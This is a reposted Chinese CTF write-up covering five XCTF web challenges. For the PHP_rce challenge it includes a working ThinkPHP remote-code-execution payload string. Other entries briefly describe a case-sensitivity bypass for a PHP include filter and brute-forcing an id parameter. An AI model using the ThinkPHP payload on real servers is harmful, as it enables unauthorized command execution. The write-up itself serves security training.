大佬教程收集整理的这篇文章主要介绍了攻防世界Web进阶区题目Writeup(持续更新),大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
0x00 baby_web
难度不大,根据题目@L_489_0@"初始页面",联想到index.PHP,但是如果在URL中直接输入index.PHP会自动跳转到1.PHP,所以bp直接抓包,修改http请求就可以了.
拿到flag
0x01 Training-WWW-Robots
考察到了robots协议,那么直接url输入robots.txt查看
拿到flag
0x02 PHP_rce
ThinkPHP框架漏洞,payload网上一大把,以后有时间会写篇文章仔细分析这个漏洞,这里不再赘述
1.看看根目录下的文件 [?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /]
2.看到flag,尝试查看内容[?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag]
拿到flag.
0x03 Web_PHP_include
进入题目给了一段代码,功能很简单,就是将page字符串中的"PHP://"关键字给替换为空,但是strstr函数对大小写敏感,所以直接大写绕过.
查看之
拿到flag
0x04 ics-06
拿到题目只有"报表中心"可以点开
看到[id=1]本以为是sql注入,但是尝试加引号等等操作之后没啥反应,索性上bp爆破试试看
看到id=2333时响应长度和其他值不一样
@H_403_115@
拿到flag
待更新----
以上是大佬教程为你收集整理的攻防世界Web进阶区题目Writeup(持续更新)全部内容,希望文章能够帮你解决攻防世界Web进阶区题目Writeup(持续更新)所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。